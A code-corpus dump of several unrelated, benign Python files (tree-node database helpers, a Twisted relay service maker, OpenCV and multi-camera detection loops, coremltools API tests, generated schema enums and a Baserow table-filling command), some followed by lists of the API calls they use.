ret = self.delete_node(uuid)
if ret.check() is False:
node_error.append(uuid)
if node_error:
return RetStatus(False, "some node delete failed.", json.dumps(node_error))
return RetStatus(True)
"""find one node or many nodes"""
def find_node(self, node_uuid=None, many=False, parents=False):
tmp_model = self.__model
if node_uuid is None:
return RetStatus(False, "invalid node uuid.")
else:
try:
node = tmp_model.query.filter(tmp_model.node_uuid==node_uuid).first()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
if many:
nodes = None
if parents:
try:
nodes = tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.node_uuid==node.parent_uuid).all()
except SQLAlchemyError as e:
return RetStatus(False, "find parents nodes failed.")
return RetStatus(True, data=nodes)
else:
try:
nodes = tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.parent_uuid==node.node_uuid).all()
except SQLAlchemyError as e:
return RetStatus(False, "find children nodes failed.")
return RetStatus(True, data=nodes)
elif node is None:
return RetStatus(False, "nothing will be search.")
else:
return RetStatus(True, data=node)
"""update node"""
def update_node(self, node=None):
tmp_session = self.__session
if node is None:
return RetStatus(False, msg="invalid node.")
else:
try:
tmp_session.commit()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
return RetStatus(True)
class TreeMixin:
node_uuid = db.Column(db.String(36), primary_key=True)
root_uuid = db.Column(db.String(36))
parent_uuid = db.Column(db.String(36))
left = db.Column(db.Integer, default=0)
right = db.Column(db.Integer, default=0)
|
[
"json.dumps",
"common.database.db.String",
"uuid.uuid1",
"common.ret_status.RetStatus",
"common.database.db.Column"
] |
[((7910, 7942), 'common.database.db.Column', 'db.Column', (['db.Integer'], {'default': '(0)'}), '(db.Integer, default=0)\n', (7919, 7942), False, 'from common.database import db\n'), ((7965, 7997), 'common.database.db.Column', 'db.Column', (['db.Integer'], {'default': '(0)'}), '(db.Integer, default=0)\n', (7974, 7997), False, 'from common.database import db\n'), ((482, 504), 'common.ret_status.RetStatus', 'RetStatus', ([], {'status': '(True)'}), '(status=True)\n', (491, 504), False, 'from common.ret_status import RetStatus\n'), ((2929, 2944), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (2938, 2944), False, 'from common.ret_status import RetStatus\n'), ((3437, 3452), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (3446, 3452), False, 'from common.ret_status import RetStatus\n'), ((5377, 5392), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (5386, 5392), False, 'from common.ret_status import RetStatus\n'), ((5922, 5937), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (5931, 5937), False, 'from common.ret_status import RetStatus\n'), ((7761, 7774), 'common.database.db.String', 'db.String', (['(36)'], {}), '(36)\n', (7770, 7774), False, 'from common.database import db\n'), ((7826, 7839), 'common.database.db.String', 'db.String', (['(36)'], {}), '(36)\n', (7835, 7839), False, 'from common.database import db\n'), ((7873, 7886), 'common.database.db.String', 'db.String', (['(36)'], {}), '(36)\n', (7882, 7886), False, 'from common.database import db\n'), ((1336, 1376), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid insert node."""'], {}), "(False, 'invalid insert node.')\n", (1345, 1376), False, 'from common.ret_status import RetStatus\n'), ((1469, 1481), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (1479, 1481), False, 'import uuid\n'), ((3117, 3155), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (3126, 3155), False, 'from common.ret_status import RetStatus\n'), ((3381, 3421), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""nothing be searched."""'], {}), "(False, 'nothing be searched.')\n", (3390, 3421), False, 'from common.ret_status import RetStatus\n'), ((4283, 4298), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (4292, 4298), False, 'from common.ret_status import RetStatus\n'), ((4348, 4386), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (4357, 4386), False, 'from common.ret_status import RetStatus\n'), ((5535, 5579), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuids list."""'], {}), "(False, 'invalid node uuids list.')\n", (5544, 5579), False, 'from common.ret_status import RetStatus\n'), ((6129, 6167), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (6138, 6167), False, 'from common.ret_status import RetStatus\n'), ((7478, 7515), 'common.ret_status.RetStatus', 'RetStatus', (['(False)'], {'msg': '"""invalid node."""'}), "(False, msg='invalid node.')\n", (7487, 7515), False, 'from common.ret_status import RetStatus\n'), ((7695, 7710), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (7704, 7710), False, 'from common.ret_status import RetStatus\n'), ((831, 869), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (840, 869), False, 'from common.ret_status import RetStatus\n'), ((2087, 2125), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (2096, 2125), False, 'from common.ret_status import RetStatus\n'), ((2231, 2243), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (2241, 2243), False, 'import uuid\n'), ((3309, 3336), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (3318, 3336), False, 'from common.ret_status import RetStatus\n'), ((4646, 4684), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (4655, 4684), False, 'from common.ret_status import RetStatus\n'), ((732, 759), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (741, 759), False, 'from common.ret_status import RetStatus\n'), ((1784, 1811), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (1793, 1811), False, 'from common.ret_status import RetStatus\n'), ((2000, 2027), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (2009, 2027), False, 'from common.ret_status import RetStatus\n'), ((4236, 4263), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (4245, 4263), False, 'from common.ret_status import RetStatus\n'), ((4566, 4593), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (4575, 4593), False, 'from common.ret_status import RetStatus\n'), ((5883, 5905), 'json.dumps', 'json.dumps', (['node_error'], {}), '(node_error)\n', (5893, 5905), False, 'import json\n'), ((6349, 6376), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (6358, 6376), False, 'from common.ret_status import RetStatus\n'), ((6773, 6800), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {'data': 'nodes'}), '(True, data=nodes)\n', (6782, 6800), False, 'from common.ret_status import RetStatus\n'), ((7142, 7169), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {'data': 'nodes'}), '(True, data=nodes)\n', (7151, 7169), False, 'from common.ret_status import RetStatus\n'), ((7224, 7267), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""nothing will be search."""'], {}), "(False, 'nothing will be search.')\n", (7233, 7267), False, 'from common.ret_status import RetStatus\n'), ((7309, 7335), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {'data': 'node'}), '(True, data=node)\n', (7318, 7335), False, 'from common.ret_status import RetStatus\n'), ((7648, 7675), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (7657, 7675), False, 'from common.ret_status import RetStatus\n'), ((1121, 1148), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (1130, 1148), False, 'from common.ret_status import RetStatus\n'), ((2886, 2913), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (2895, 2913), False, 'from common.ret_status import RetStatus\n'), ((5334, 5361), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (5343, 5361), False, 'from common.ret_status import RetStatus\n'), ((6699, 6745), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""find parents nodes failed."""'], {}), "(False, 'find parents nodes failed.')\n", (6708, 6745), False, 'from common.ret_status import RetStatus\n'), ((7067, 7114), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""find children nodes failed."""'], {}), "(False, 'find children nodes failed.')\n", (7076, 7114), False, 'from common.ret_status import RetStatus\n')]
|
from twisted.application.service import ServiceMaker
TransitRelay = ServiceMaker(
"Magic-Wormhole Transit Relay", # name
"wormhole_transit_relay.server_tap", # module
"Provide the Transit Relay server for Magic-Wormhole clients.", # desc
"transitrelay", # tapname
)
|
[
"twisted.application.service.ServiceMaker"
] |
[((69, 242), 'twisted.application.service.ServiceMaker', 'ServiceMaker', (['"""Magic-Wormhole Transit Relay"""', '"""wormhole_transit_relay.server_tap"""', '"""Provide the Transit Relay server for Magic-Wormhole clients."""', '"""transitrelay"""'], {}), "('Magic-Wormhole Transit Relay',\n 'wormhole_transit_relay.server_tap',\n 'Provide the Transit Relay server for Magic-Wormhole clients.',\n 'transitrelay')\n", (81, 242), False, 'from twisted.application.service import ServiceMaker\n')]
|
import numpy as np
import imutils
import time
import cv2
video = cv2.VideoCapture(0)
video.set(cv2.CAP_PROP_BUFFERSIZE, 2)
while True:
ret, frame = video.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
all_chans = []
for chan in frame[:, :]:
_, binary = cv2.threshold(chan, 70, 255, cv2.THRESH_BINARY)
# binary = cv2.adaptiveThreshold(chan, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 151, 1.9)
all_chans.append(binary)
all_chans = np.array(all_chans)
"Mean color value and post conversion, not in mean!"
chan_mean = all_chans.mean(axis=2).astype("uint8")
kernel = np.ones((3, 3))
kernel = kernel / kernel.sum()
dil = cv2.dilate(chan_mean, kernel=kernel, iterations=1)
ero = cv2.erode(chan_mean, kernel=kernel, iterations=2)
# cv2.imshow("Frame", frame)
# cv2.imshow("all_chans", all_chans)
cv2.imshow("chan_mean", chan_mean)
# cv2.imshow("dil", dil)
# cv2.imshow("ero", ero)
key = cv2.waitKey(100)
if key == ord("q"):
break
elif key == 32:
cv2.imwrite("capture.png", frame)
print("Frame captured")
elif key > 0:
print("Pressed:", key)
|
[
"cv2.dilate",
"cv2.cvtColor",
"cv2.waitKey",
"cv2.threshold",
"cv2.imwrite",
"numpy.ones",
"cv2.VideoCapture",
"numpy.array",
"cv2.erode",
"cv2.imshow"
] |
[((66, 85), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (82, 85), False, 'import cv2\n'), ((178, 217), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2GRAY'], {}), '(frame, cv2.COLOR_BGR2GRAY)\n', (190, 217), False, 'import cv2\n'), ((498, 517), 'numpy.array', 'np.array', (['all_chans'], {}), '(all_chans)\n', (506, 517), True, 'import numpy as np\n'), ((645, 660), 'numpy.ones', 'np.ones', (['(3, 3)'], {}), '((3, 3))\n', (652, 660), True, 'import numpy as np\n'), ((706, 756), 'cv2.dilate', 'cv2.dilate', (['chan_mean'], {'kernel': 'kernel', 'iterations': '(1)'}), '(chan_mean, kernel=kernel, iterations=1)\n', (716, 756), False, 'import cv2\n'), ((767, 816), 'cv2.erode', 'cv2.erode', (['chan_mean'], {'kernel': 'kernel', 'iterations': '(2)'}), '(chan_mean, kernel=kernel, iterations=2)\n', (776, 816), False, 'import cv2\n'), ((896, 930), 'cv2.imshow', 'cv2.imshow', (['"""chan_mean"""', 'chan_mean'], {}), "('chan_mean', chan_mean)\n", (906, 930), False, 'import cv2\n'), ((1000, 1016), 'cv2.waitKey', 'cv2.waitKey', (['(100)'], {}), '(100)\n', (1011, 1016), False, 'import cv2\n'), ((287, 334), 'cv2.threshold', 'cv2.threshold', (['chan', '(70)', '(255)', 'cv2.THRESH_BINARY'], {}), '(chan, 70, 255, cv2.THRESH_BINARY)\n', (300, 334), False, 'import cv2\n'), ((1083, 1116), 'cv2.imwrite', 'cv2.imwrite', (['"""capture.png"""', 'frame'], {}), "('capture.png', frame)\n", (1094, 1116), False, 'import cv2\n')]
|
import coremltools as ct
import pytest
def _get_visible_items(d):
return [x for x in dir(d) if not x.startswith("_")]
def _check_visible_modules(actual, expected):
if set(actual) != set(expected):
raise AssertionError("API mis-matched. Got %s, expected %s" % (
actual,
expected,
))
class TestApiVisibilities:
"""Test public coremltools API visibilities."""
@staticmethod
def test_top_level():
expected = [
"ClassifierConfig",
"EnumeratedShapes",
"ImageType",
"RangeDim",
"SPECIFICATION_VERSION",
"Shape",
"TensorType",
"convert",
"converters",
"libcoremlpython",
"models",
"proto",
"target",
"utils",
"version",
"test",
]
if not ct.utils._is_macos():
expected.remove("libcoremlpython")
_check_visible_modules(_get_visible_items(ct), expected)
@staticmethod
def test_utils():
expected = [
"convert_double_to_float_multiarray_type",
"convert_neural_network_spec_weights_to_fp16",
"convert_neural_network_weights_to_fp16",
"evaluate_classifier",
"evaluate_classifier_with_probabilities",
"evaluate_regressor",
"evaluate_transformer",
"load_spec",
"rename_feature",
"save_spec",
]
_check_visible_modules(_get_visible_items(ct.utils), expected)
@staticmethod
def test_models():
expected = [
"MLModel",
"datatypes",
"model",
"neural_network",
"pipeline",
"tree_ensemble",
"utils",
"nearest_neighbors",
"feature_vectorizer",
]
_check_visible_modules(_get_visible_items(ct.models), expected)
@staticmethod
def test_models_mlmodel():
expected = [
"author",
"get_spec",
"input_description",
"license",
"output_description",
"predict",
"save",
"short_description",
"user_defined_metadata",
"version",
]
_check_visible_modules(_get_visible_items(ct.models.MLModel), expected)
@staticmethod
def test_models_neural_network():
expected = [
"AdamParams",
"NeuralNetworkBuilder",
"SgdParams",
"builder",
"datatypes",
"flexible_shape_utils",
"optimization_utils",
"printer",
"quantization_utils",
"set_training_features",
"set_transform_interface_params",
"spec_inspection_utils",
"update_optimizer_utils",
"utils",
]
_check_visible_modules(_get_visible_items(ct.models.neural_network), expected)
@staticmethod
def test_models_neural_network_utils():
expected = ["NeuralNetworkBuilder", "make_image_input", "make_nn_classifier"]
_check_visible_modules(
_get_visible_items(ct.models.neural_network.utils), expected
)
@staticmethod
def test_models_tree_ensemble():
expected = [
"TreeEnsembleBase",
"TreeEnsembleClassifier",
"TreeEnsembleRegressor",
"set_classifier_interface_params",
"set_regressor_interface_params",
]
_check_visible_modules(_get_visible_items(ct.models.tree_ensemble), expected)
@staticmethod
def test_models_pipeline():
expected = [
"Pipeline",
"PipelineClassifier",
"PipelineRegressor",
"set_classifier_interface_params",
"set_regressor_interface_params",
"set_training_features",
"set_transform_interface_params",
]
_check_visible_modules(_get_visible_items(ct.models.pipeline), expected)
@staticmethod
def test_converters():
expected = [
"ClassifierConfig",
"EnumeratedShapes",
"ImageType",
"RangeDim",
"Shape",
"TensorType",
"caffe",
"convert",
"keras",
"libsvm",
"mil",
"onnx",
"sklearn",
"xgboost",
]
_check_visible_modules(_get_visible_items(ct.converters), expected)
@staticmethod
def test_converters_caffe():
_check_visible_modules(_get_visible_items(ct.converters.caffe), ["convert"])
@pytest.mark.skipif(
ct.utils._python_version() >= (3, 8, 0),
reason="Keras isn't compatible with Python 3.8+.",
)
@pytest.mark.xfail(
condition=not ct.utils._is_macos(),
reason="rdar://65138103 (Keras converter not exposed on Linux)",
run=False,
)
def test_converters_keras(self):
_check_visible_modules(_get_visible_items(ct.converters.keras), ["convert"])
@staticmethod
def test_converters_libsvm():
_check_visible_modules(_get_visible_items(ct.converters.libsvm), ["convert"])
@pytest.mark.skipif(
ct.utils._python_version() >= (3, 8, 0),
reason="ONNX isn't compatible with Python 3.8+.",
)
def test_converters_onnx(self):
_check_visible_modules(_get_visible_items(ct.converters.onnx), ["convert"])
@staticmethod
def test_converters_sklearn():
_check_visible_modules(_get_visible_items(ct.converters.sklearn), ["convert"])
@staticmethod
def test_converters_xgboost():
_check_visible_modules(_get_visible_items(ct.converters.xgboost), ["convert"])
def test_converters_mil(self):
pass # TODO: [Create API visibility tests for MIL](rdar://64413959)
@staticmethod
def test_models_neural_network_quantization_utils():
expected = [
"AdvancedQuantizedLayerSelector",
"MatrixMultiplyLayerSelector",
"ModelMetrics",
"NoiseMetrics",
"OutputMetric",
"QuantizedLayerSelector",
"TopKMetrics",
"activate_int8_int8_matrix_multiplications",
"compare_models",
"quantize_weights",
]
_check_visible_modules(
_get_visible_items(ct.models.neural_network.quantization_utils), expected
)
@staticmethod
def test_models_neural_network_flexible_shape_utils():
expected = [
"NeuralNetworkImageSize",
"NeuralNetworkImageSizeRange",
"NeuralNetworkMultiArrayShape",
"NeuralNetworkMultiArrayShapeRange",
"Shape",
"ShapeRange",
"Size",
"add_enumerated_image_sizes",
"add_enumerated_multiarray_shapes",
"add_multiarray_ndshape_enumeration",
"set_multiarray_ndshape_range",
"update_image_size_range",
"update_multiarray_shape_range",
]
_check_visible_modules(
_get_visible_items(ct.models.neural_network.flexible_shape_utils), expected
)
@staticmethod
def test_models_neural_network_update_optimizer_utils():
expected = ["AdamParams", "Batch", "RangeParam", "SgdParams"]
_check_visible_modules(
_get_visible_items(ct.models.neural_network.update_optimizer_utils),
expected,
)
@staticmethod
def test_models_neural_network_optimization_utils():
_check_visible_modules(
_get_visible_items(ct.models.neural_network.optimization_utils), [],
)
|
[
"coremltools.utils._is_macos",
"coremltools.utils._python_version"
] |
[((912, 932), 'coremltools.utils._is_macos', 'ct.utils._is_macos', ([], {}), '()\n', (930, 932), True, 'import coremltools as ct\n'), ((4754, 4780), 'coremltools.utils._python_version', 'ct.utils._python_version', ([], {}), '()\n', (4778, 4780), True, 'import coremltools as ct\n'), ((5325, 5351), 'coremltools.utils._python_version', 'ct.utils._python_version', ([], {}), '()\n', (5349, 5351), True, 'import coremltools as ct\n'), ((4907, 4927), 'coremltools.utils._is_macos', 'ct.utils._is_macos', ([], {}), '()\n', (4925, 4927), True, 'import coremltools as ct\n')]
|
from dataclasses import dataclass, field
from enum import Enum
from typing import Optional
__NAMESPACE__ = "NISTSchema-SV-IV-atomic-ID-enumeration-1-NS"
class NistschemaSvIvAtomicIdEnumeration1Type(Enum):
ITEMPLATES_RESOURCE = "itemplates.resource_"
HORGANIZ = "horganiz"
WORK_OF_IS_DOCUMENTS_RELATIONSHIPS_OF_AT_OBJECT = "_work-of-is-documents_relationships-of_at.object"
MACCOMPLISH_VERSIONS_CARE_DEFINE_AND_PR = "maccomplish.versions.care.define-and.pr"
DALLOW_SUCCESS_OF_DEVICES_ENOUGH_THE_RETRIEVE = "dallow-success-of_devices_enough_the.retrieve"
MANUFACTURERS_INFORMATION_WORLD_TH = "_manufacturers_information.world_th"
HDOCUMENTS_IMPACT = "hdocuments-impact"
@dataclass
class Out:
class Meta:
name = "out"
namespace = "NISTSchema-SV-IV-atomic-ID-enumeration-1-NS"
any_element: Optional[object] = field(
default=None,
metadata={
"type": "Wildcard",
"namespace": "##any",
}
)
@dataclass
class NistschemaSvIvAtomicIdEnumeration1:
class Meta:
name = "NISTSchema-SV-IV-atomic-ID-enumeration-1"
namespace = "NISTSchema-SV-IV-atomic-ID-enumeration-1-NS"
value: Optional[NistschemaSvIvAtomicIdEnumeration1Type] = field(
default=None,
metadata={
"required": True,
}
)
|
[
"dataclasses.field"
] |
[((863, 935), 'dataclasses.field', 'field', ([], {'default': 'None', 'metadata': "{'type': 'Wildcard', 'namespace': '##any'}"}), "(default=None, metadata={'type': 'Wildcard', 'namespace': '##any'})\n", (868, 935), False, 'from dataclasses import dataclass, field\n'), ((1251, 1299), 'dataclasses.field', 'field', ([], {'default': 'None', 'metadata': "{'required': True}"}), "(default=None, metadata={'required': True})\n", (1256, 1299), False, 'from dataclasses import dataclass, field\n')]
|
import os
import sys
import csv
import cv2
import math
import time
import numbers
import numpy as np
from multiprocessing import Process
# local imported codes
import parameters as parm
from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, \
single_cam_detector, multi_cam_detector
class SingleCameraDetector(Process):
"""
Process for single camera detection
"""
def __init__(self, index, queue, FPS):
super().__init__()
self.queue = queue
self.index = index
self.realtime = isinstance(self.index, numbers.Number)
self.fps = FPS
self.frame_h = None
self.frame_w = None
self.scale_factor = None
self.aspect_ratio = None
self.cap = None
self.fgbg = None
self.detector = None
self.video_ends_indicator = 0
self.frame_count = 0
self.frame = None
self.good_tracks = None
self.origin = np.array([0, 0])
self.tracks = []
self.next_id = 0
def run(self):
self.cap = cv2.VideoCapture(self.index)
self.frame_w = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))
self.frame_h = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.scale_factor = math.sqrt(self.frame_w ** 2 + self.frame_h ** 2) / math.sqrt(848 ** 2 + 480 ** 2)
self.aspect_ratio = self.frame_w / self.frame_h
downsample = False
if self.frame_w * self.frame_h > 1920 * 1080:
downsample = True
self.frame_w = 1920
self.frame_h = int(1920 / aspect_ratio)
self.scale_factor = math.sqrt(self.frame_w ** 2 + self.frame_h ** 2) / math.sqrt(848 ** 2 + 480 ** 2)
self.fgbg, self.detector = setup_system_objects(self.scale_factor)
# check if video capturing is successful
ret, self.frame = self.cap.read()
if ret:
if self.realtime:
print(f"Video Capture {self.index}: PASS")
else:
print(f"File Read \"{self.index}\": PASS")
else:
if self.realtime:
print(f"Video Capture {self.index}: FAIL")
else:
print(f"File Read \"{self.index}\": FAIL")
self.cap.release()
while self.cap.isOpened():
ret, self.frame = self.cap.read()
if ret:
self.frame = cv2.resize(self.frame, (self.frame_w, self.frame_h))
self.good_tracks, self.tracks, self.next_id, self.frame = single_cam_detector(
self.tracks, self.next_id, self.index, self.fgbg, self.detector, self.fps,
self.frame_w, self.frame_h, self.scale_factor, self.origin, self.frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
self.video_ends_indicator = 1
break
self.queue.put((self.good_tracks, self.frame_count, self.frame))
self.frame_count += 1
if self.video_ends_indicator == 1:
break
self.cap.release()
cv2.destroyAllWindows()
class MultiCameraDetector(Process):
"""
Process for multi camera detection
"""
def __init__(self, filenames, queue, FPS):
super().__init__()
self.filenames = filenames
self.queue = queue
self.realtime = isinstance(self.filenames[0], numbers.Number)
self.cameras = []
self.fps = FPS
self.video_ends_indicator = 0
self.frame_count = 0
self.good_tracks = None
self.start_timer = None
self.end_timer = None
def run(self):
for filename in self.filenames:
camera = Camera(filename, self.fps)
ret, self.frame = camera.cap.read()
if ret:
self.cameras.append(camera)
if self.realtime:
print(f"Video Capture {filename}: PASS")
else:
print(f"File Read \"{filename}\": PASS")
else:
if self.realtime:
print(f"Video Capture {filename}: FAIL")
else:
print(f"File Read \"{filename}\": FAIL")
camera.cap.release()
while True:
self.start_timer = time.time()
sendList = []
for index, camera in enumerate(self.cameras):
ret, frame = camera.cap.read()
if ret:
frame = cv2.resize(frame, (camera.frame_w, camera.frame_h))
self.good_tracks, frame = multi_cam_detector(camera, frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
self.video_ends_indicator = 1
break
else:
self.video_ends_indicator = 1
break
sendList.append((self.good_tracks, frame, camera.dead_tracks))
# sendList: [(good_tracks_0, frame_0, dead_tracks_0), (good_tracks_1, frame_1, dead_tracks_1), frame_count]
sendList.append((self.frame_count))
self.queue.put(sendList)
self.frame_count += 1
if self.video_ends_indicator == 1:
break
self.end_timer = time.time()
print(f"Detection process took: {self.end_timer - self.start_timer}")
cv2.destroyAllWindows()
for index, camera in enumerate(self.cameras):
camera.cap.release()
with open(f"data_out_{index}.csv", 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
for row in camera.output_log:
writer.writerow(row)
|
[
"object_tracking_util.setup_system_objects",
"object_tracking_util.Camera",
"math.sqrt",
"csv.writer",
"cv2.waitKey",
"time.time",
"cv2.VideoCapture",
"numpy.array",
"object_tracking_util.multi_cam_detector",
"object_tracking_util.single_cam_detector",
"cv2.destroyAllWindows",
"cv2.resize"
] |
[((995, 1011), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (1003, 1011), True, 'import numpy as np\n'), ((1101, 1129), 'cv2.VideoCapture', 'cv2.VideoCapture', (['self.index'], {}), '(self.index)\n', (1117, 1129), False, 'import cv2\n'), ((1785, 1824), 'object_tracking_util.setup_system_objects', 'setup_system_objects', (['self.scale_factor'], {}), '(self.scale_factor)\n', (1805, 1824), False, 'from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, single_cam_detector, multi_cam_detector\n'), ((3163, 3186), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3184, 3186), False, 'import cv2\n'), ((5472, 5495), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (5493, 5495), False, 'import cv2\n'), ((1293, 1341), 'math.sqrt', 'math.sqrt', (['(self.frame_w ** 2 + self.frame_h ** 2)'], {}), '(self.frame_w ** 2 + self.frame_h ** 2)\n', (1302, 1341), False, 'import math\n'), ((1344, 1374), 'math.sqrt', 'math.sqrt', (['(848 ** 2 + 480 ** 2)'], {}), '(848 ** 2 + 480 ** 2)\n', (1353, 1374), False, 'import math\n'), ((3777, 3803), 'object_tracking_util.Camera', 'Camera', (['filename', 'self.fps'], {}), '(filename, self.fps)\n', (3783, 3803), False, 'from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, single_cam_detector, multi_cam_detector\n'), ((4379, 4390), 'time.time', 'time.time', ([], {}), '()\n', (4388, 4390), False, 'import time\n'), ((5369, 5380), 'time.time', 'time.time', ([], {}), '()\n', (5378, 5380), False, 'import time\n'), ((1667, 1715), 'math.sqrt', 'math.sqrt', (['(self.frame_w ** 2 + self.frame_h ** 2)'], {}), '(self.frame_w ** 2 + self.frame_h ** 2)\n', (1676, 1715), False, 'import math\n'), ((1718, 1748), 'math.sqrt', 'math.sqrt', (['(848 ** 2 + 480 ** 2)'], {}), '(848 ** 2 + 480 ** 2)\n', (1727, 1748), False, 'import math\n'), ((2441, 2493), 'cv2.resize', 'cv2.resize', (['self.frame', '(self.frame_w, self.frame_h)'], {}), '(self.frame, (self.frame_w, self.frame_h))\n', (2451, 2493), False, 'import cv2\n'), ((2569, 2745), 'object_tracking_util.single_cam_detector', 'single_cam_detector', (['self.tracks', 'self.next_id', 'self.index', 'self.fgbg', 'self.detector', 'self.fps', 'self.frame_w', 'self.frame_h', 'self.scale_factor', 'self.origin', 'self.frame'], {}), '(self.tracks, self.next_id, self.index, self.fgbg, self.\n detector, self.fps, self.frame_w, self.frame_h, self.scale_factor, self\n .origin, self.frame)\n', (2588, 2745), False, 'from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, single_cam_detector, multi_cam_detector\n'), ((5685, 5704), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (5695, 5704), False, 'import csv\n'), ((4575, 4626), 'cv2.resize', 'cv2.resize', (['frame', '(camera.frame_w, camera.frame_h)'], {}), '(frame, (camera.frame_w, camera.frame_h))\n', (4585, 4626), False, 'import cv2\n'), ((4673, 4706), 'object_tracking_util.multi_cam_detector', 'multi_cam_detector', (['camera', 'frame'], {}), '(camera, frame)\n', (4691, 4706), False, 'from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, single_cam_detector, multi_cam_detector\n'), ((2797, 2811), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (2808, 2811), False, 'import cv2\n'), ((4731, 4745), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (4742, 4745), False, 'import cv2\n')]
|
import os
TEST_API_TOKEN = os.getenv('ZENODO_ACCESS_TOKEN')
|
[
"os.getenv"
] |
[((28, 60), 'os.getenv', 'os.getenv', (['"""ZENODO_ACCESS_TOKEN"""'], {}), "('ZENODO_ACCESS_TOKEN')\n", (37, 60), False, 'import os\n')]
|
import sys
from decimal import Decimal
from math import ceil
from django.core.management.base import BaseCommand
from django.db.models import Max
from faker import Faker
from baserow.contrib.database.fields.field_helpers import (
construct_all_possible_field_kwargs,
)
from baserow.contrib.database.fields.handler import FieldHandler
from baserow.contrib.database.rows.handler import RowHandler
from baserow.contrib.database.table.models import Table
class Command(BaseCommand):
help = "Fills a table with random data."
def add_arguments(self, parser):
parser.add_argument(
"table_id", type=int, help="The table that needs to be " "filled."
)
parser.add_argument(
"limit", type=int, help="Amount of rows that need to be " "inserted."
)
parser.add_argument(
"--add-columns",
action="store_true",
help="Add a column for every field type other than link row to the table "
"before populating it.",
)
def handle(self, *args, **options):
table_id = options["table_id"]
limit = options["limit"]
add_columns = "add_columns" in options and options["add_columns"]
try:
table = Table.objects.get(pk=table_id)
except Table.DoesNotExist:
self.stdout.write(
self.style.ERROR(f"The table with id {table_id} was not " f"found.")
)
sys.exit(1)
fill_table(limit, table, add_columns=add_columns)
self.stdout.write(self.style.SUCCESS(f"{limit} rows have been inserted."))
def fill_table(limit, table, add_columns=False):
fake = Faker()
row_handler = RowHandler()
cache = {}
if add_columns:
create_a_column_for_every_type(table)
model = table.get_model()
# Find out what the highest order is because we want to append the new rows.
order = ceil(model.objects.aggregate(max=Max("order")).get("max") or Decimal("0"))
for i in range(0, limit):
# Based on the random_value function we have for each type we can
# build a dict with a random value for each field.
values = {
f"field_{field_id}": field_object["type"].random_value(
